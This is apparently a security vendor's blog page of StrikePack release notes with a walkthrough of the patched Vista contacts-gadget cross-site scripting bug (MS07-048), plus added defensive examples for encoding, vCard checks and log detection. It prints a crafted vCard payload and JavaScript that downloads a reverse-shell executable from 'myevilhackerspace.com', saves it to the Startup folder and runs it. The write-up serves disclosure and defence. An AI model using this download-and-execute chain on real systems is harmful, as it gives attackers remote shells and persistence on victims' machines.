StrikePack 13868 Released
StrikePack 13868 is now available to BreakingPoint customers. This release contains nine new strikes covering three different vulnerabilities.
Vista Gadget Patches in MS07-048
Among the items patched in August by Microsoft were bugs in several Sidebar Gadgets included as part of Windows Vista. The advisory lists the RSS, contact, and weather gadgets as vulnerable to remote code execution.
Windows Vista Gadgets are described by Microsoft as "mini applications." This is somewhat of a misnomer. At their simplest, they are locally-hosted web applications that bundle all HTML, javascript, and other resources in a directory. As such, the application that hosts gadgets is actually IE7, or to use the description of Microsoft, gadgets "[use] the functionality of the Microsoft HTML (MSHTML) runtime, [and] are not limited by the standard browser security model."
Removing the standard browser security model means that gadgets have the ability to make calls to any code available locally or remotely. Local Active X controls, shell commands, and executables may be executed by a gadget. As will also be demonstrated, remotely-hosted executables can be downloaded to the machine and subsequently run.
The nature of the vulnerability in the contacts gadget is cross-site scripting in any of the phone number fields for a contact. Importing a specially-crafted contact file, and then viewing the contact in the gadget will result in code execution. This concept was to be one of the points in a talk at Defcon by Aviv Raff. A video demonstration of the attack has been made public. Since the bug is patched, we thought we'd show just how this attack works.
In the folder for the contact gadget is the file contact.html. The vulnerable version contains the following line of code, which inserts each of the phone numbers for the contact into the gadget HTML view:
newCell.innerHTML = "<span class='phone' title='" +
phoneNumber+"'></span>";
Each of the phone number fields is being placed into a <SPAN> tag with no filtering; this is as basic a cross-site scripting vulnerability as you can get.
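To show what the missing filtering step looks like, here is the same rendering step written both ways. This is an added example, not code from the original post or from the Vista gadget itself; it builds the markup as a string so it runs outside a browser, and the injected sample value and the phone-number allow-list are assumptions made for the example.

```javascript
// Added example: the contact gadget's "phone number into a title attribute"
// rendering step, first as written in the vulnerable contact.html, then hardened.

// Vulnerable form: the value is concatenated straight into the attribute.
function renderPhoneCellUnsafe(phoneNumber) {
  return "<span class='phone' title='" + phoneNumber + "'></span>";
}

// Output encoding: neutralise the five characters that can close an
// attribute or a tag. The single quote matters here because the gadget
// uses single-quoted attributes.
function escapeHtmlAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Input validation (assumed allow-list): digits, spaces and a little
// punctuation are all a phone number needs. Length bound keeps out
// long payloads hidden behind runs of spaces.
const PHONE_ALLOWED = /^[0-9+\-.() ]{1,32}$/;
function isPlausiblePhone(value) {
  return PHONE_ALLOWED.test(value);
}

// Hardened form: validate first, then encode on output regardless, so a
// value that slips past the allow-list still cannot break out of the attribute.
function renderPhoneCellSafe(phoneNumber) {
  const shown = isPlausiblePhone(phoneNumber) ? phoneNumber : "(invalid number)";
  return "<span class='phone' title='" + escapeHtmlAttr(shown) + "'></span>";
}

// Constructed sample: a phone number followed by an attribute breakout,
// the same shape as the crafted vCard field in the post (payload replaced).
const INJECTED = "(512) 555 - 1212 ' style='x:expression(1)";

console.log(renderPhoneCellUnsafe(INJECTED)); // breaks out of title=''
console.log(renderPhoneCellSafe(INJECTED));   // stays inside the attribute
```

Either of the two defences alone would have stopped this particular card; doing both means a change to the allow-list later does not silently reopen the attribute context.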
First, you must convince your victim to add your vcard. An example card is shown below, with long lines broken by backslash:
BEGIN:VCARD
VERSION:3.0
FN:Inspector Gadget
TEL;type=HOME:(512) 555 - 1212\
' \
style='c:expression(document.all[document.all.length-1]\
.src="http://myevilhackerspace.com/adodb.js")
END:VCARD

One thing to point out here is that the embedded spaces between the telephone number and the embedded HTML style attribute will hide the attack when viewed in the contact manager in Windows Vista. Up to 3 embedded lines of javascript could be included in the contact file, as the home, work, and mobile phone numbers are all open to the same attack. Luckily, one injected javascript file will do the trick.
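Since the card is the delivery vehicle, the import step is the other place to catch this. The following is an added example, not part of the original post: a small vCard 3.0 reader that unfolds continuation lines, pulls out every TEL property, and reports the ones whose value cannot be a phone number. The sample cards are constructed for the example (the injected value uses a placeholder expression rather than the post's payload), and the allow-list is an assumption.

```javascript
// Added example: detect crafted TEL fields in a vCard before it is imported.

// RFC 2425 line folding: a line that starts with a space or tab continues
// the previous line. Unfold first, or an attacker can split a payload
// across lines so that no single line looks suspicious.
function unfoldVCard(text) {
  return text.replace(/\r?\n[ \t]/g, "");
}

// Parse "NAME;param=value;...:value" lines into plain objects.
// The first colon separates name+params from the value, so a value may
// itself contain colons (e.g. "x:expression(...)").
function parseVCard(text) {
  const props = [];
  for (const line of unfoldVCard(text).split(/\r?\n/)) {
    if (!line.trim()) continue;
    const colon = line.indexOf(":");
    if (colon < 0) continue;
    const [name, ...params] = line.slice(0, colon).split(";");
    props.push({ name: name.toUpperCase(), params, value: line.slice(colon + 1) });
  }
  return props;
}

// Assumed allow-list for a phone number value.
const PHONE_ALLOWED = /^[0-9+\-.() ]{1,32}$/;

// One finding per TEL property whose value fails the allow-list.
function findSuspiciousTel(text) {
  return parseVCard(text)
    .filter((p) => p.name === "TEL" && !PHONE_ALLOWED.test(p.value))
    .map((p) => ({ params: p.params, value: p.value }));
}

// Constructed sample: the HOME number is padded with spaces (hidden in the
// contact manager view) and folded onto a second line; the WORK number is clean.
const SAMPLE_CARD = [
  "BEGIN:VCARD",
  "VERSION:3.0",
  "FN:Inspector Gadget",
  "TEL;type=HOME:(512) 555 - 1212        ' ",
  " style='x:expression(1)'",
  "TEL;type=WORK:(512) 555 - 1313",
  "END:VCARD",
].join("\r\n");

// Constructed clean card for comparison.
const CLEAN_CARD = [
  "BEGIN:VCARD",
  "VERSION:3.0",
  "FN:Penny",
  "TEL;type=CELL:+1 512 555 1414",
  "END:VCARD",
].join("\r\n");

console.log(findSuspiciousTel(SAMPLE_CARD)); // one finding, the HOME number
console.log(findSuspiciousTel(CLEAN_CARD));  // []
```

An importer that rejects a card with any finding, or at least strips the offending TEL value, removes the gadget's exposure even if the rendering code is never fixed; fixing both is the right answer.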

The embedded style attribute evaluates a line of javascript which causes IE7 to download the javascript. This is done by abusing the <SCRIPT> tag embedded in the gadget's HTML interface. In the vulnerable file, the <SCRIPT> tag is the last tag in the file, located just before the close of the <HTML> tag.
When the gadget makes the request for the javascript file, the user agent is IE7, and the Referer URL is empty. When XMLHttpRequest makes the request for the executable, it has a mildly interesting Referer URL of x-gadget:///contacts.html
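That Referer value is the one network-visible indicator in the chain, so here is an added example of using it (not from the original post): a scan over constructed proxy log lines that flags executables fetched with an x-gadget: referer. The log format is an assumption made for the example, and the hosts, client address and user-agent string are constructed.

```javascript
// Added example: flag executable downloads whose Referer carries the
// x-gadget: scheme observed on the gadget's XMLHttpRequest.
//
// Assumed log format (one request per line):
//   <timestamp> <client> <method> <url> "<referer>" "<user-agent>"
const LOG_LINE = /^(\S+) (\S+) (\S+) (\S+) "([^"]*)" "([^"]*)"$/;

function parseLogLine(line) {
  const m = LOG_LINE.exec(line);
  if (!m) return null;
  return { ts: m[1], client: m[2], method: m[3], url: m[4], referer: m[5], ua: m[6] };
}

// File types no Sidebar gadget has a legitimate reason to pull from the internet.
const BINARY_EXT = /\.(exe|dll|scr|com|bat)(\?.*)?$/i;

// Return the requests that were made from a gadget (x-gadget: referer) for a binary.
function gadgetDownloads(lines) {
  const hits = [];
  for (const line of lines) {
    const r = parseLogLine(line);
    if (!r) continue;
    const fromGadget = r.referer.toLowerCase().startsWith("x-gadget:");
    if (fromGadget && BINARY_EXT.test(r.url)) {
      hits.push({ ...r, reason: "executable fetched by a Sidebar gadget" });
    }
  }
  return hits;
}

// Constructed sample log. The second line is the gadget fetching the injected
// script: as the post notes, its Referer is empty, so it carries no indicator.
// The third line is the XMLHttpRequest for the executable.
const SAMPLE_LOG = [
  '2007-08-17T10:00:01Z 10.0.0.5 GET http://news.example/index.html "http://news.example/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"',
  '2007-08-17T10:00:05Z 10.0.0.5 GET http://attacker.example/adodb.js "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"',
  '2007-08-17T10:00:06Z 10.0.0.5 GET http://attacker.example/payload.exe "x-gadget:///contacts.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"',
];

for (const hit of gadgetDownloads(SAMPLE_LOG)) {
  console.log(`${hit.ts} ${hit.client} ${hit.url} (${hit.reason})`);
}
```

The script fetch itself looks like any other IE7 request, which is why the rule keys on the second request rather than the first; on a proxy that strips or rewrites Referer this indicator disappears, and host-side controls (the import check, the fixed rendering) have to carry the load.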
The following javascript code is downloaded and run by the gadget:
var url="http://myevilhackerspace.com/reverse9999.exe";
var path=System.Environment.\
getEnvironmentVariable("APPDATA") +
"\\Microsoft\\Windows\\Start Menu" +
"\\Programs\\StartUp\\reverse9999.exe";
var x = new XMLHttpRequest();
x.open("GET", url, true);
x.send();
var a = new ActiveXObject("ADODB.Stream");
a.Type = 1;
a.Open();
a.Write(x.responseBody);
a.SaveToFile(path, 2);
a.Close;
a = null;
System.Shell.execute(path);

The injected javascript specifies a remotely-hosted executable file to be downloaded, which in this case is a reverse-connect shell that will connect to the attacker on TCP port 9999. It then specifies a location to save the file, using the Windows environment variables to place it in the user's startup folder. The file is downloaded using the XMLHttpRequest object, passing the resulting bytes to the ADODB.Stream Active X control to save to disk. Once the file is saved, it is executed, and the attacker now has a remote shell on the Vista box.
Strikes covering MS07-048 are included in BreakingPoint Systems StrikePack Update 13566, which was released on Fri August 17, 2007.
StrikePack 13566 Released
This StrikePack adds fifteen strikes covering nine new vulnerabilities. This update includes coverage for the patches released by Microsoft on August 14th, the recent Firefox URI handler issues, a buffer overflow in the SAP Message Server, a denial of service flaw in Windows Media when processing AU files, and a processing bug in the tcpdump network monitor application.
Vegas Redux: Black Hat / Defcon Materials
The materials from my Black Hat and Defcon presentations are now available online. If you were not able to attend the talks, the Tactical Exploitation whitepaper is a good place to start. The Black Hat presentation was much more detailed than the Defcon version, due to the longer time slot.
StrikePack 13343 Released
StrikePack 13343 is now available to BreakingPoint customers. This release contains ten new strikes covering four different vulnerabilities.
StrikePack 13086 Released
StrikePack 13086 is now available to BreakingPoint customers. This release contains 7 new strikes covering 6 different vulnerabilities.
